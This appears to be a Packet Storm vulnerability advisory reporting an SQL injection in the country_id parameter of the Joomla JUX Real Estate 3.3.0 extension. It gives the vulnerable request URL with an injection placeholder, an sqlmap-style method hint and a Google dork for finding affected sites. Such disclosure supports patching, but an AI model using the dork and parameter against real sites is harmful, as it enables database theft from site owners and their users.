Joomla JUX Real Estate 3.3.0 SQL Injection

2018-01-05T00:00:00
ID PACKETSTORM:145684
Type packetstorm
Reporter Bilal Kardadou
Modified 2018-01-05T00:00:00

Description

                                        
                                            `################################################  
#Title: Joomla! JUX Real Estate 3.3.0 - SQL injection  
#Credit: Bilal KARDADOU  
#Vendor: https://joomlaux.com  
#URL:  
https://extensions.joomla.org/extensions/extension/vertical-markets/real-estate/jux-real-estate/  
#Product: 'Joomla! JUX Real Estate 3.3.0'  
#Developer: JoomlaUX  
#Extension type: Plugin  
#Last updated: Oct 30 2017  
#Compatibility: 3.X  
#Type: Paid download  
#Google Dork: inurl:"index.php?option=com_jux_real_estate"  
################################################  
#  
# Description:  
# JUX Real Estate is a JOOMLA component designed to fit a multitude of real  
estate related needs, and it is developed by JoomlaUX team.  
#  
#  
# --Method=GET -p [country_id]  
#  
# -u "  
http://127.0.0.1/realestate/index.php?option=com_jux_real_estate&view=realties&Itemid=148&title=a&price_slider_lower=28607&price_slider_upper=400000&area_slider_lower=30&area_slider_upper=400&type_id=0&cat_id=0&country_id=[SQLI]&locstate=&beds=0&agent_id=&baths=0&jp_yearbuilt=&button=Search  
"  
#  
# PoC:  
# https://prnt.sc/hw0u6q  
#  
#  
# Bilal KARDADOU - https://www.linkedin.com/in/kardadou/)  
################################################  
`